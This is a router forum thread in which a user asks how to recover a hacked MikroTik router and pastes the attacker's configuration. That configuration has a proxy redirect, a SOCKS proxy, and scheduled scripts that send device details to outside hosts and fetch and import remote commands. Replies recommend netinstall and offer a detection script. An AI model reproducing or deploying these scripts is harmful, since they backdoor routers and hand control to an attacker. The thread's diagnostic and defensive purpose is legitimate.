fitrah6
just joined
Topic Author
Posts: 1
Joined: Thu Sep 20, 2018 1:31 pm

Can't Upgrade router mikrotik because hacked

Thu Sep 20, 2018 1:38 pm

Hello guys,

My router was hacked, and now clients on the LAN network can't access some websites (just some, not all). After removing the configuration made by the hacker, I tried to upgrade the RouterOS version, but I can't upgrade RouterOS via /system packages or by manually uploading the .npk file. How can I fix this issue without netinstall? The router is very far from my location.
This is the configuration made by the hacker:

/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp src-address-list=!Ok to-ports=8080
/ip proxy
set anonymous=yes enabled=yes
/ip proxy access
add action=deny
/ip socks
set port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
/system scheduler
add interval=3m name="DDNS Serv" on-event="/system script run iDDNS" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
/system script
add name=script4_ owner=userpolicy=ftp,reboot,read,write,policy,test,password,sensitive source=\
"/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
add name=iDDNS owner=userpolicy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=":global mac [/interface ethern\
et get 1 mac-address]\r\
\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\"_\".[/ip proxy get port])\r\
\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled].\"_\".[/interface pptp-server server get enabled])\r\
\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
\n/tool fetch address=src-ip.com src-path=\$cmd mode=http dst-path=dns;:delay 3s\r\
\n/import dns;:delay 4s;/file remove dns"

Best Regards
Fitrah Ali Hudzaifah Sofyan
 
GREG3f
Frequent Visitor
Posts: 77
Joined: Wed Dec 03, 2008 9:52 pm

Re: Can't Upgrade router mikrotik because hacked

Wed Oct 10, 2018 3:40 am

I have the same issue, did anyone find a solution other than netinstall?
 
R1CH
Forum Veteran
Posts: 828
Joined: Sun Oct 01, 2006 11:44 pm

Re: Can't Upgrade router mikrotik because hacked

Wed Oct 10, 2018 1:15 pm

The ONLY safe way is to netinstall. The exploit can install files outside of RouterOS, so your router remains compromised even after a config reset. You can still export your config and import it again after sanitizing it.
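
One way to review an export before re-importing it, as an added example that is not part of the original post or any MikroTik tool: a Python script that flags the kinds of entries seen in the attacker configuration quoted in the first post. The rule list, function names and sample export are assumptions made for illustration, and a match means "review this line", not proof of compromise.

```python
import re

# (section, regex, reason): heuristics modelled on the attacker config quoted
# in the first post. They flag lines for human review; they prove nothing.
RULES = [
    ("/ip firewall nat", r"action=redirect\b.*\bto-ports=", "NAT redirect to a local port"),
    ("/ip proxy", r"\benabled=yes\b", "web proxy enabled"),
    ("/ip socks", r"^set\b", "SOCKS settings present"),
    ("/system scheduler", r"\bon-event=", "scheduled job"),
    ("/system script", r"/tool fetch|/import\b", "script fetches or imports a file"),
]

def logical_lines(export_text):
    """Join export lines that were wrapped with a trailing backslash."""
    buf = ""
    for raw in export_text.splitlines():
        part = raw.strip()
        if part.endswith("\\"):
            buf += part[:-1]          # drop the continuation marker, keep the text
            continue
        yield buf + part
        buf = ""

def audit(export_text):
    """Return (section, reason, line) for every line matching a rule."""
    findings, section = [], None
    for line in logical_lines(export_text):
        if line.startswith("/"):      # assumes each section header is on its own line
            section = line
            continue
        for sec, pattern, reason in RULES:
            if section == sec and re.search(pattern, line):
                findings.append((sec, reason, line))
    return findings

# Constructed sample export (not from a real device; 192.0.2.10 is a documentation address).
SAMPLE = r"""/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=redirect chain=dstnat dst-port=80 protocol=tcp to-ports=8080
/ip proxy
set anonymous=yes enabled=yes
/ip socks
set port=4153
/system scheduler
add interval=3m name=job1 on-event="/system script run s1" start-time=startup
/system script
add name=s1 source="/tool fetch address=192.0.2.10 src-path=/x mode=http\r\
    \n/import x"
"""
```

Run `audit()` over the text of a saved export and review every returned line before importing the file into the freshly netinstalled router.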
 
Victoria168
just joined
Posts: 1
Joined: Fri Oct 19, 2018 2:35 pm

Re: Can't Upgrade router mikrotik because hacked

Fri Oct 19, 2018 2:37 pm

  • Did you update to the latest version?
  • Did you block access to your service ports, e.g. by address list or single subnet?
  • Or did you limit access to IP services ("Available from")?
Last edited by Victoria168 on Mon Oct 22, 2018 8:02 am, edited 1 time in total.
 
sindy
Forum Guru
Posts: 2640
Joined: Mon Dec 04, 2017 9:19 pm

Re: Can't Upgrade router mikrotik because hacked

Sat Oct 20, 2018 8:05 pm

@Victoria168, none of the correct hints you gave can help after the malware has already squatted on the machine. So as things stand now, netinstall is the only way.
Instead of writing novels, post /export hide-sensitive. Use find&replace in your favourite text editor to systematically replace all occurrences of each public IP address potentially identifying you by a distinctive pattern such as my.public.ip.1.
 
limbo
just joined
Posts: 5
Joined: Fri Jan 27, 2017 10:15 pm

Re: Can't Upgrade router mikrotik because hacked

Fri Jan 11, 2019 7:08 pm

Although I'm not answering the starting question, my device was hacked too and I was forced to use netinstall.

So my questions are:
How did the intruder gain access in the first place?
What's the use of this hack (remote control, packet sniffing, DDoS attacks, bitcoin mining)?
How can I check in a timely manner whether my devices are secure or not? I discovered it when Winbox access was blocked.

Any tips?
 
sebastia
Forum Guru
Posts: 1292
Joined: Tue Oct 12, 2010 3:23 am
Location: Antwerp, BE

Re: Can't Upgrade router mikrotik because hacked

Fri Jan 11, 2019 9:53 pm

There were a number of known bugs on versions up to and including 6.42. Some of these exploits could lead to low level system access, below what an administrator has access to.
Which version were you at?

Tips: follow the security blog and upgrade...
 
anav
Forum Guru
Posts: 2257
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Can't Upgrade router mikrotik because hacked

Fri Jan 11, 2019 10:00 pm

My understanding, sebastia, is that the bugs were exploitable if basic security practices were not followed.
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
